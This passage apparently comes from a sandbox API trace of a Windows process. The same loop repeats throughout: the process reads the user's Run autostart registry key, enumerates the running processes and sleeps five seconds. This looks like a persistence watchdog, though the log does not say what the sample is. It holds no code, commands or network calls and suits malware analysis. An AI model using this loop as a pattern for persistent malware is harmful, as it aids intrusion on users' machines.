Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.353] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.353] NtClose (Handle=0x274) returned 0x0 [0182.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.363] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.363] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.363] NtClose (Handle=0x274) returned 0x0 [0182.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.372] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.378] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.380] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.380] NtClose (Handle=0x274) returned 0x0 [0182.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.393] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.394] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.394] NtClose (Handle=0x274) returned 0x0 [0182.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.402] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.403] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.403] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.403] NtClose (Handle=0x274) returned 0x0 [0182.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.414] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.415] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.415] NtClose (Handle=0x274) returned 0x0 [0182.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.423] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.424] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.425] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.425] NtClose (Handle=0x274) returned 0x0 [0182.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.435] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.435] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.435] NtClose (Handle=0x274) returned 0x0 [0182.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.444] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.500] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.501] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.501] NtClose (Handle=0x274) returned 0x0 [0182.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.508] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.526] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.527] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.527] NtClose (Handle=0x274) returned 0x0 [0182.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.545] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.545] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.545] NtClose (Handle=0x274) returned 0x0 [0182.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.556] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.557] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.558] NtClose (Handle=0x274) returned 0x0 [0182.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.567] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.568] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.568] NtClose (Handle=0x274) returned 0x0 [0182.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0182.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0182.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0182.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0182.577] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0182.579] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0182.579] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0182.579] NtClose (Handle=0x274) returned 0x0 [0182.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0182.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0182.583] NtFreeVirtualMemory 